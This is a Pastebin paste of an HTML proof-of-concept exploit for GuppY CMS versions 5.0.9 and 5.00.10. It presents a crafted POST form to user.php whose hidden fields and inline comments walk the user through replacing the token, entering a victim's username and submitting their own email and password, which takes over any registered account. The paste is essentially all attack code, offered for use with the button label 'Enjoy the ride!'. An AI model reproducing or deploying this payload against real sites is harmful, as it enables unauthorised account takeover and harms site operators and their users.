Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <html>
- <body bgcolor="#000000">
- <font face="arial" color="#01DF01" size="5">
- <center>
- GuppY CMS 5.0.9 & 5.00.10 Authentication bypass/Change email. Other versions may be vulnerable but weren't tested.<br>
- Stable with Firefox 34.0.5. Other browsers may be unstable or may not work.<br><br><br>
- Thanks: Fred, d1ch4do, & to all of the people who don't believe in me.<br>
- <a href="https://linkedin.com/in/brandonm86">My LinkedIn</a><br>-----------------------------------------------------------------------------------</font>
- <body>
- <form action="http://website.com/user.php?lng=en" method="POST"> <!-- Change this action to http://website.com/user.php?lng=en&uuser=new to work with 5.00.10. -->
- <input type="hidden" name="token" value="131095497e5f9d22882.83937400"/> <!-- Click on become a member. View the source then search for "token" and replace this value. Remove this line to work with 5.00.10 -->
- <input type="hidden" name="setusercookie" value="1"/>
- <input type="hidden" name="uuser" value="update"/> <!-- Wet paint. Don't touch! -->
- <input type="hidden" name="code_pseudo" value=""/>
- <input type="text" name="upseudo" value="Vic Username"/><br><br> <!-- User to login as. Can be any registered user with(out) special privileges. -->
- <input type="text" name="uuid" value="Password"/><br><br> <!-- Anything you like as you will change the password to what you want after the exploit succeeds. -->
- <input type="text" name="uuid2" value="Verify Password"/><br><br>
- <input type="text" name="uemail" value="Your Email"/><br><br><br> <!-- Email will be changed to the one you provide. -->
- <input type="hidden" name="uwebsite" value="http://"/>
- <input type="hidden" name="usign" value=""/>
- <input type="hidden" name="uimgsign" value="http://"/>
- <input type="hidden" name="ulang" value="en"/>
- <input type="hidden" name="udesign" value=""/>
- <input type="hidden" name="uboxes" value="LR"/>
- <input type="hidden" name="uextavatar" value="http://"/>
- <input type="submit" value="Enjoy the ride!"/></center>
- </form>
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement